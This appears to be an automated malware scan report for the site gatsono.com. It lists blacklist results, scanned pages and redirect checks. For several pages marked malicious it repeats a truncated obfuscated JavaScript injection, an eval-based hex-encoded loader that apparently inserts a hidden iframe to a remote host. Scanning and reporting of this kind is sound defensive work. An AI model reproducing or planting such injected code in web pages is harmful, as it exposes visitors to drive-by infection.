Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gatsono.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gatsono.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gatsono.com/ | 200 OK Content-Length: 14252 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/cp/scripts/index.html | 200 OK Content-Length: 7833 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/cp/scripts/ASP/index.html | 200 OK Content-Length: 2376 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/Perl/index.html | 200 OK Content-Length: 2376 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/cp/scripts/PHP/index.html | 200 OK Content-Length: 7644 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/cp/scripts/PHP/chat.html | 200 OK Content-Length: 4522 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/cp/scripts/PHP/./chat/phpchat.php | 200 OK Content-Length: 1375 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./chat/phpchat.php?mode=showall | 200 OK Content-Length: 293 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./chat/phpchat.php?mode=admin | 200 OK Content-Length: 351 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./Chat/readme.txt | 200 OK Content-Length: 2245 Content-Type: text/plain | clean |
http://gatsono.com/cp/scripts/PHP/countsetup.html | 200 OK Content-Length: 4535 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document.body^=~1;}catch(q){a2="!"}z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!6f!69!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!6f!69!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!79!7a!6d!74!7d!70!7e!79!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!6f!69!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42! Antivirus reports:
| ||
http://gatsono.com/cp/scripts/PHP/./counter/counter.php | 200 OK Content-Length: 724 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./counter/function.fopen | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://gatsono.com/cp/scripts/PHP/./Counter/readme.txt | 200 OK Content-Length: 2955 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gatsono.com
Result:
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2014 23:28:36 GMT
Accept-Ranges: bytes
ETag: "80d344f48a3bce1:0"
Content-Length: 14252
Content-Type: text/html
Last-Modified: Wed, 17 Apr 2013 16:45:23 GMT
X-Powered-By: ASP.NET
...14252 bytes of data.
GET / HTTP/1.1
Host: gatsono.com
Result:
HTTP/1.1 200 OK
Date: Sat, 11 Oct 2014 23:28:36 GMT
Accept-Ranges: bytes
ETag: "80d344f48a3bce1:0"
Content-Length: 14252
Content-Type: text/html
Last-Modified: Wed, 17 Apr 2013 16:45:23 GMT
X-Powered-By: ASP.NET
...14252 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gatsono.com
Referer: http://www.google.com/search?q=gatsono.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gatsono.com
Referer: http://www.google.com/search?q=gatsono.com
Result:
The result is similar to the first query. There are no suspicious redirects found.